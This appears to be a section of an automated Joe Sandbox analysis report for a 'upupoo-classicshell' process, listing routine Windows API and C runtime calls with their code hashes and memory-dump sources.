                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 21f173c06110ca813b1d8a54799e0dc708626917daf07cb3fb25c619c4a9ea40
                                                                                                              • Instruction ID: ef9529c39e39e816a71c09c075ce6ac7450448646c7ad7eb61865e6f519ba466
                                                                                                              • Opcode Fuzzy Hash: 21f173c06110ca813b1d8a54799e0dc708626917daf07cb3fb25c619c4a9ea40
                                                                                                              • Instruction Fuzzy Hash: AE41B076F00600AFEB14CF78C881A5EB7E5FF89790B1641A9E519EB345DB35AE01CB81
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 4029f72a9cedb2e10ca2970135893f4b7af01a4ab0c6799626f855d027ed05b6
                                                                                                              • Instruction ID: e35493495043ad1a1ccfe49b872ca59baab5d91ace91ec579b7fe638c86971b1
                                                                                                              • Opcode Fuzzy Hash: 4029f72a9cedb2e10ca2970135893f4b7af01a4ab0c6799626f855d027ed05b6
                                                                                                              • Instruction Fuzzy Hash: 6341D232A04204DFDB14CFB8C980B9EB7F5FF89714B1145A9E655EB345EB72AA01CB80
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 10009187
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100091AA
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100091D0
                                                                                                              • _free.LIBCMT ref: 100091E3
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100091F2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2278895681-0
                                                                                                              • Opcode ID: 16ffc57c662404d9b0081ecc531bac5b523678dd3ae3e573b2155707af292dbe
                                                                                                              • Instruction ID: 4c5b1dbe4fe441e3b5a8e38914c4a6167444b4a600d1b6b9f77a85a0ac6f7216
                                                                                                              • Opcode Fuzzy Hash: 16ffc57c662404d9b0081ecc531bac5b523678dd3ae3e573b2155707af292dbe
                                                                                                              • Instruction Fuzzy Hash: CB018F7A7052267BB32187A65C8CCBB2AADEFC6AE1311012EFD08C3249DA608D0191B0
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6E0B3AC3
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0B3AE6
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E0B3B0C
                                                                                                              • _free.LIBCMT ref: 6E0B3B1F
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E0B3B2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2278895681-0
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 00C21538
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C21545
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 00C2155F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2351996187-0
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,A08361BA,-00000004,100099DF,10007D8E,A08361BA,?,100079B7,00000001,00000001), ref: 1000833A
                                                                                                              • _free.LIBCMT ref: 1000836F
                                                                                                              • _free.LIBCMT ref: 10008396
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 100083A3
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 100083AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,E644DAF2,-00000004,6E0B1256,6E0B0E6F,E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B16C4
                                                                                                              • _free.LIBCMT ref: 6E0B16F9
                                                                                                              • _free.LIBCMT ref: 6E0B1720
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 6E0B172D
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 6E0B1736
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              APIs
                                                                                                              • RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00C214C2
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C214DC
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00C214E9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00C214F9
                                                                                                              • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00C21510
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExceptionRaiseSection$CurrentEnterLeaveThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2580436124-0
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C26B96
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __amsg_exit.LIBCMT ref: 00C26BB6
                                                                                                              • __lock.LIBCMT ref: 00C26BC6
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00C26BE3
                                                                                                              • InterlockedIncrement.KERNEL32(02902D08), ref: 00C26C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 4271482742-0
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 00C254D9
                                                                                                                • Part of subcall function 00C28FB8: __mtinitlocknum.LIBCMT ref: 00C28FCE
                                                                                                                • Part of subcall function 00C28FB8: __amsg_exit.LIBCMT ref: 00C28FDA
                                                                                                                • Part of subcall function 00C28FB8: EnterCriticalSection.KERNEL32(?,?,?,00C2F0E5,00000004,00C36788,0000000C,00C2AFB2,00C25FFC,?,00000000,00000000,00000000,?,00C275E5,00000001), ref: 00C28FE2
                                                                                                              • ___sbh_find_block.LIBCMT ref: 00C254E4
                                                                                                              • ___sbh_free_block.LIBCMT ref: 00C254F3
                                                                                                              • HeapFree.KERNEL32(00000000,00C25FFC,00C362E8,0000000C,00C28F99,00000000,00C36620,0000000C,00C28FD3,00C25FFC,?,?,00C2F0E5,00000004,00C36788,0000000C), ref: 00C25523
                                                                                                              • GetLastError.KERNEL32(?,00C2F0E5,00000004,00C36788,0000000C,00C2AFB2,00C25FFC,?,00000000,00000000,00000000,?,00C275E5,00000001,00000214), ref: 00C25534
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714421763-0
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 1000ACA8
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 1000ACBA
                                                                                                              • _free.LIBCMT ref: 1000ACCC
                                                                                                              • _free.LIBCMT ref: 1000ACDE
                                                                                                              • _free.LIBCMT ref: 1000ACF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B4721
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4733
                                                                                                              • _free.LIBCMT ref: 6E0B4745
                                                                                                              • _free.LIBCMT ref: 6E0B4757
                                                                                                              • _free.LIBCMT ref: 6E0B4769
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 78d7b4fcf8ec9f966539c14da26d1ac86f7fb3fc87b71d7a655ed2ed892b8f22
                                                                                                              • Instruction ID: 2151294d3fe7ad2ac8836310e1e301935c8d65fb922282ffa6c168288a0761b1
                                                                                                              • Opcode Fuzzy Hash: 78d7b4fcf8ec9f966539c14da26d1ac86f7fb3fc87b71d7a655ed2ed892b8f22
                                                                                                              • Instruction Fuzzy Hash: B0F062B1404A04AFCA40DAD5E5E4E5F33EDFB02B90B600C05F068E7A04EB32F981CAA4
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 10007C6C
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 10007C7E
                                                                                                              • _free.LIBCMT ref: 10007C91
                                                                                                              • _free.LIBCMT ref: 10007CA2
                                                                                                              • _free.LIBCMT ref: 10007CB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 5c4eb71f65a9c4c2e480ee765673f68e3255d5b53a9b05a421f3ce7727c5b878
                                                                                                              • Instruction ID: 15d336a34c38f9e85d3b72396b98038e7891700ac1bd6798f0f1a356c855b910
                                                                                                              • Opcode Fuzzy Hash: 5c4eb71f65a9c4c2e480ee765673f68e3255d5b53a9b05a421f3ce7727c5b878
                                                                                                              • Instruction Fuzzy Hash: 94F0DA74840630BBFB1A9F689C854193BB5FF196A1342824BF81C57379CB399941DF81
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B0A4C
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B0A5E
                                                                                                              • _free.LIBCMT ref: 6E0B0A71
                                                                                                              • _free.LIBCMT ref: 6E0B0A82
                                                                                                              • _free.LIBCMT ref: 6E0B0A93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 3d06de8ee8f16da7aaed61dba7b1f72d64fc843e056c6309666c0ffa3124e432
                                                                                                              • Instruction ID: 70da2271bd070f207aa8043803e31c715250b94cc745a67275f91e5f9e621efd
                                                                                                              • Opcode Fuzzy Hash: 3d06de8ee8f16da7aaed61dba7b1f72d64fc843e056c6309666c0ffa3124e432
                                                                                                              • Instruction Fuzzy Hash: 93F030B4414920DF9F465F649A4858D3B75BB17F283851506F128E7358EF731441DBD4
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(1B171CE2), ref: 6E097D01
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID: j3$j3$j3
                                                                                                              • API String ID: 4139908857-1354161450
                                                                                                              • Opcode ID: 461ca0e5c2f60c4f8b010c2dee7150ca232f38b83a4dd15445b3814ac145e3a5
                                                                                                              • Instruction ID: c77ce8a92bc1c8a1bfea6b2f39079d58a417db26877acaab5f078e5b308ed0e5
                                                                                                              • Opcode Fuzzy Hash: 461ca0e5c2f60c4f8b010c2dee7150ca232f38b83a4dd15445b3814ac145e3a5
                                                                                                              • Instruction Fuzzy Hash: A43190756187448FC720CF69C48076ABBF1FB9A340F14982EE8D8CB3A5D635E804AF46
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00C2878A
                                                                                                                • Part of subcall function 00C286E5: ___BuildCatchObjectHelper.LIBCMT ref: 00C2871B
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00C287A1
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 00C287AF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2163707966-1018135373
                                                                                                              • Opcode ID: d395e47c4fee3de36c1416e76e79c5948a22428b50d66019b152ee7b52fcb40c
                                                                                                              • Instruction ID: fe546538c2859702e35fb667fe375a6322019b50ea52cd4f9c6ac75276a639d2
                                                                                                              • Opcode Fuzzy Hash: d395e47c4fee3de36c1416e76e79c5948a22428b50d66019b152ee7b52fcb40c
                                                                                                              • Instruction Fuzzy Hash: F1012431002229BBDF12AE51EC85EAA3F6AEF08354F208010BD1814960DB3299B5EBA0
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00C261EF), ref: 00C2BBA0
                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00C2BBB0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                              • Opcode ID: b065b56095e6a9fdd61944f49a098c1690d6b43f7780b1c3b736c777d38142ee
                                                                                                              • Instruction ID: 90de14b43f817c12555d0f153ade2cf8b74a5bfb9be0ba144ee1b758d8cb521a
                                                                                                              • Opcode Fuzzy Hash: b065b56095e6a9fdd61944f49a098c1690d6b43f7780b1c3b736c777d38142ee
                                                                                                              • Instruction Fuzzy Hash: 87F03A30A20A59D3DF046BA6BD0EBAE7BB9FB80706F820590D592E00C8DF319574C352
                                                                                                              APIs
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: Taskbar Created), ref: 00C213FD
                                                                                                              • SetTimer.USER32(?,00000001,00000064,00000000), ref: 00C21410
                                                                                                              Strings
                                                                                                              • Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt, xrefs: 00C213F6
                                                                                                              • StartMenu: Taskbar Created, xrefs: 00C213F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File@@Timer
                                                                                                              • String ID: Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartMenu: Taskbar Created
                                                                                                              • API String ID: 2092230787-2359932185
                                                                                                              • Opcode ID: f3b44d2a53f1d98bab78d8327e013d9ecd81be0b6ac65db320e69c549c6abfbd
                                                                                                              • Instruction ID: e662e69f7842df74e7d350dfc0b9c088bc8566d1b91a8e7331b5d36431eaf419
                                                                                                              • Opcode Fuzzy Hash: f3b44d2a53f1d98bab78d8327e013d9ecd81be0b6ac65db320e69c549c6abfbd
                                                                                                              • Instruction Fuzzy Hash: 8AD012717A13907FE2305724AC8BF8B3A649B05B27F010C21B905FA2D1C5E2D6548664
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1036877536-0
                                                                                                              • Opcode ID: ace672a97ed4c0fa7cffafdca87237a441724fbd2c9da2f75922482c0f7fd9bc
                                                                                                              • Instruction ID: fd2fa88911dd0db4f2864ac5c6d8752dd7b2de48414999dcb17b675285aa49f5
                                                                                                              • Opcode Fuzzy Hash: ace672a97ed4c0fa7cffafdca87237a441724fbd2c9da2f75922482c0f7fd9bc
                                                                                                              • Instruction Fuzzy Hash: CCA15532E143869FE711CFE8C890BAEBBE5FF16394F14466DD5949B282C33A8945C790
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 1000A21B
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000A2A4
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000A2B6
                                                                                                              • __freea.LIBCMT ref: 1000A2BF
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 573072132-0
